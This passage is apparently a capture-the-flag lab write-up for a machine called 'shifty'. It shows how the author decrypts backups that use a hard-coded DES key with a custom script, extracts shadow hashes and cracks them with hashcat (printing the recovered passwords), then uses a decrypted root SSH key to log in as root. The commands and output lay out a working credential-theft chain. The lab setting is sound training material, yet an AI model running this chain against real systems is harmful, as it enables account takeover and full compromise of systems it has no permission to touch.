Decryption


While checking the filesystem, I came across an interesting directory containing a Python script that performs a backup operation: it hashes each filename and encrypts the file content with a custom DES Python module.

While hashing is one-way, so the original filenames are practically unrecoverable, DES is a symmetric cipher and its key, 87629ae8, is hard-coded into the script. Anyone who can read the script can therefore reverse the backup routine and decrypt the content.

jerry@shifty:/opt/backups$ tar -czf /tmp/data.tar.gz ./data
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ scp -i ~/.ssh/id_ed25519 jerry@$IP:/tmp/data.tar.gz ./data.tar.gz
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
data.tar.gz                             100%   18KB 230.2KB/s   00:00    
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ tar -xf data.tar.gz; rm data.tar.gz 

First, I grab all the files within the /opt/backups/data directory.

decrypt.py


import sys
import os
from des import des, CBC, PAD_PKCS5
 
def decrypt_file(encrypted_path):
    # Decrypt the content
    with open(encrypted_path, 'rb') as f:
        ciphertext = f.read()
    # Use the same DES key and IV as in the backup function
    k = des(b"87629ae8", CBC, b"\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
    plaintext = k.decrypt(ciphertext)
    print("#########################\n### Decrypted Content ###\n#########################")
    try:
        print(plaintext.decode('utf-8'))
    except UnicodeDecodeError:
        print("Unable to decode content as UTF-8. Displaying bytes:")
        print(plaintext)
 
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: {sys.argv[0]} <encrypted_file>')
        sys.exit(1)
    encrypted_file = sys.argv[1]
    decrypt_file(encrypted_file)

I created a simple Python script to decrypt the content of the input file.

shadow


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ python3 decrypt.py data/0317ce62a75684cf0fcf8452a7fe5e5e919d1b730644bf16a304a919 
#########################
### Decrypted Content ###
#########################
root:$6$jper7Hn5$SKBpBAiF8T1My6Ju4a30gVrnADwsbKUH.Z3ViJ/BWqIqVNhU.YZL0ljLfRmK7WRNGFK.LuKCPlBnIW3B/h2n9.:18408:0:99999:7:::
daemon:*:18408:0:99999:7:::
bin:*:18408:0:99999:7:::
sys:*:18408:0:99999:7:::
sync:*:18408:0:99999:7:::
games:*:18408:0:99999:7:::
man:*:18408:0:99999:7:::
lp:*:18408:0:99999:7:::
mail:*:18408:0:99999:7:::
news:*:18408:0:99999:7:::
uucp:*:18408:0:99999:7:::
proxy:*:18408:0:99999:7:::
www-data:*:18408:0:99999:7:::
backup:*:18408:0:99999:7:::
list:*:18408:0:99999:7:::
irc:*:18408:0:99999:7:::
gnats:*:18408:0:99999:7:::
nobody:*:18408:0:99999:7:::
systemd-timesync:*:18408:0:99999:7:::
systemd-network:*:18408:0:99999:7:::
systemd-resolve:*:18408:0:99999:7:::
systemd-bus-proxy:*:18408:0:99999:7:::
_apt:*:18408:0:99999:7:::
Debian-exim:!:18408:0:99999:7:::
messagebus:*:18408:0:99999:7:::
sshd:*:18408:0:99999:7:::
jerry:$6$1gpf0S3D$WXA0bEA7zI.WLwnZ26ePrZ4f.nG0tyB/miajWs8UyDBZupzto6pA7oQD2a.4yKMxEk0Uwh9RvKnnTIYCt3Hjh.:18408:0:99999:7:::
memcache:!:18415:0:99999:7:::

Decrypting the 0317ce62a75684cf0fcf8452a7fe5e5e919d1b730644bf16a304a919 file revealed what appears to be the content of a shadow file.
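Before feeding such a dump to hashcat it is worth triaging it: which accounts carry a real hash, which are locked, and how old the entries are. The following is an added example (not part of the original write-up) that parses shadow(5) lines like the ones above, maps the crypt prefix to the hashcat mode used in the next section, and converts the "last change" day count into a date; the sample input is a constructed excerpt of the decrypted file with the hash strings truncated.

```python
# Added example (not from the write-up): triage a shadow(5) dump like the
# decrypted backup above. Classifies each password field, maps the hash
# prefix to its hashcat mode, and dates the "last change" field.
from datetime import date, timedelta
from typing import NamedTuple, Optional

# crypt(5) prefixes and the hashcat mode that cracks them.
HASH_TYPES = {"$1$": ("md5crypt", 500), "$5$": ("sha256crypt", 7400),
              "$6$": ("sha512crypt", 1800)}

class ShadowEntry(NamedTuple):
    user: str
    status: str                  # "locked", "empty", algorithm name or "unknown"
    hashcat_mode: Optional[int]  # None when there is nothing to crack
    last_change: Optional[date]

def parse_shadow_line(line: str) -> ShadowEntry:
    fields = line.rstrip("\n").split(":")
    if len(fields) < 3:
        raise ValueError(f"malformed shadow entry: {line!r}")
    user, pw, lastchg = fields[:3]
    # Field 3 counts days since 1970-01-01; empty means never changed.
    changed = date(1970, 1, 1) + timedelta(days=int(lastchg)) if lastchg else None
    if pw == "":
        return ShadowEntry(user, "empty", None, changed)
    if pw[0] in "*!":
        # "*", "!" or "!<hash>": password authentication is disabled.
        return ShadowEntry(user, "locked", None, changed)
    for prefix, (name, mode) in HASH_TYPES.items():
        if pw.startswith(prefix):
            return ShadowEntry(user, name, mode, changed)
    return ShadowEntry(user, "unknown", None, changed)

def crackable_accounts(shadow_text: str) -> list:
    """Entries carrying a real hash, i.e. the lines that belong in hashes.txt."""
    entries = [parse_shadow_line(l) for l in shadow_text.splitlines() if l.strip()]
    return [e for e in entries if e.hashcat_mode is not None]

# Constructed excerpt of the decrypted file; the hash strings are truncated.
SAMPLE_SHADOW = """\
root:$6$jper7Hn5$SKBpBAiF8T1My6Ju4a30gVrnADwsbKUH:18408:0:99999:7:::
daemon:*:18408:0:99999:7:::
Debian-exim:!:18408:0:99999:7:::
jerry:$6$1gpf0S3D$WXA0bEA7zI.WLwnZ26ePrZ4f.nG0tyB:18408:0:99999:7:::
memcache:!:18415:0:99999:7:::
"""

if __name__ == "__main__":
    for e in crackable_accounts(SAMPLE_SHADOW):
        print(f"{e.user}: {e.status}, hashcat -m {e.hashcat_mode}, changed {e.last_change}")
```

Only root and jerry come out as hashcat candidates, and the 18408 day count dates every entry to 2020-05-26, which shows how stale the backed-up credentials are.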

Password Cracking


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ hashcat --show ./hashes.txt
 
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ hashcat -a 0 -m 1800 ./hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$6$1gpf0S3D$WXA0bEA7zI.WLwnZ26ePrZ4f.nG0tyB/miajWs8UyDBZupzto6pA7oQD2a.4yKMxEk0Uwh9RvKnnTIYCt3Hjh.:password
$6$jper7Hn5$SKBpBAiF8T1My6Ju4a30gVrnADwsbKUH.Z3ViJ/BWqIqVNhU.YZL0ljLfRmK7WRNGFK.LuKCPlBnIW3B/h2n9.:root
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: ./hashes.txt
Time.Started.....: Wed Mar  5 15:14:44 2025 (4 mins, 19 secs)
Time.Estimated...: Wed Mar  5 15:19:03 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     3124 H/s (8.11ms) @ Accel:256 Loops:512 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new), 2/2 (100.00%) Salts
Progress.........: 1613824/28688770 (5.63%)
Rejected.........: 0/1613824 (0.00%)
Restore.Point....: 806656/14344385 (5.62%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:4608-5000
Candidate.Engine.: Device Generator
Candidates.#1....: rosaura19 -> room126
Hardware.Mon.#1..: Util: 79%
 
Started: Wed Mar  5 15:14:42 2025
Stopped: Wed Mar  5 15:19:05 2025

Password hashes cracked

jerry@shifty:~$ su root
Password: root
su: Authentication failure

It would appear that the password of the root account has changed.

SSH Private Key


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ python3 decrypt.py data/31328fa57f5c504df041f7f4f45498c766c0d12c33f78f33cff66bca 
#########################
### Decrypted Content ###
#########################
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

The 31328fa57f5c504df041f7f4f45498c766c0d12c33f78f33cff66bca file contains what appears to be a private SSH key.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ nano ./id_rsa.root
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ chmod 600 ./id_rsa.root

SSH


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ ssh root@$IP -i ./id_rsa.root
Linux shifty 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1+deb9u1 (2020-06-07) x86_64
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 30 11:36:58 2024
root@shifty:~# whoami
root
root@shifty:~# hostname
shifty
root@shifty:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:d3:9d brd ff:ff:ff:ff:ff:ff
    inet 192.168.219.59/24 brd 192.168.219.255 scope global ens192
       valid_lft forever preferred_lft forever

The private SSH key belongs to the root account. System-level compromise.